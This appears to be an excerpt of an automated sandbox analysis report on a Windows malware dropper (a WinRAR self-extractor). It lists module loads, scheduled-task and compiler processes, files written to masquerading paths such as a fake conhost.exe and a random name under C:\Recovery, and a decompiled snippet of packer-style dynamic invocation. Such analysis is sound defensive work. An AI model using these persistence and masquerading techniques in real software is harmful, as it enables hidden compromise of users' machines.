Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: ktmw32.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: rasapi32.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: rasman.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: rtutils.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: winnsi.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: propsys.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: dlnashext.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: wpdshext.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: edputil.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: urlmon.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: iertutil.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: srvcli.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: wintypes.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: appresolver.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: bcp47langs.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: slc.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: userenv.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: sppc.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Section loaded: sspicli.dll
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: mscoree.dll
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: kernel.appcore.dll
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: version.dll
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: uxtheme.dll
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: windows.storage.dll
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: wldp.dll
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: profapi.dll
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: cryptsp.dll
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: rsaenh.dll
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: cryptbase.dll
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: sspicli.dll
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: mscoree.dll
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: kernel.appcore.dll
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: version.dll
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: uxtheme.dll
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: windows.storage.dll
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: wldp.dll
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: profapi.dll
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: cryptsp.dll
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: rsaenh.dll
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: cryptbase.dll
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Section loaded: sspicli.dll
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Section loaded: mscoree.dll
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Section loaded: apphelp.dll
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Section loaded: version.dll
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Section loaded: wldp.dll
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Section loaded: profapi.dll
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Section loaded: sspicli.dll
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Section loaded: mscoree.dll
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Section loaded: version.dll
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Section loaded: wldp.dll
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Section loaded: profapi.dll
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll

Source: C:\Users\user\Desktop\yX8787W7de.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Directory created: C:\Program Files\Internet Explorer\en-US\SwjJGfgwqbpLdPqvPFcqLsY.exe			Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Directory created: C:\Program Files\Internet Explorer\en-US\31d454e2f3d20a			Jump to behavior

Source: yX8787W7de.exe

Static file information: File size 2010836 > 1048576

Source: yX8787W7de.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: yX8787W7de.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: yX8787W7de.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: yX8787W7de.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: yX8787W7de.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: yX8787W7de.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: yX8787W7de.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: yX8787W7de.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: yX8787W7de.exe
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\i0e0ny4g\i0e0ny4g.pdb source: MsintoRefcommonsvc.exe, 00000005.00000002.1885029457.00000000038EE000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: conhost.exe, 0000001F.00000002.1998443695.000000001BDE3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: conhost.exe, 0000001F.00000002.1998443695.000000001BDE3000.00000004.00000020.00020000.00000000.sdmp

Source: yX8787W7de.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: yX8787W7de.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: yX8787W7de.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: yX8787W7de.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: yX8787W7de.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, Lb8dIiZQrm4v1PoKFpp.cs	.Net Code: Type.GetTypeFromHandle(kDrJNDJ0MHwHDFF2LVY.N1ORfbhMA1Z(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(kDrJNDJ0MHwHDFF2LVY.N1ORfbhMA1Z(16777245)),Type.GetTypeFromHandle(kDrJNDJ0MHwHDFF2LVY.N1ORfbhMA1Z(16777259))})
Source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, Lb8dIiZQrm4v1PoKFpp.cs	.Net Code: Type.GetTypeFromHandle(kDrJNDJ0MHwHDFF2LVY.N1ORfbhMA1Z(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(kDrJNDJ0MHwHDFF2LVY.N1ORfbhMA1Z(16777245)),Type.GetTypeFromHandle(kDrJNDJ0MHwHDFF2LVY.N1ORfbhMA1Z(16777259))})

Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i0e0ny4g\i0e0ny4g.cmdline"
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i0e0ny4g\i0e0ny4g.cmdline"	Jump to behavior
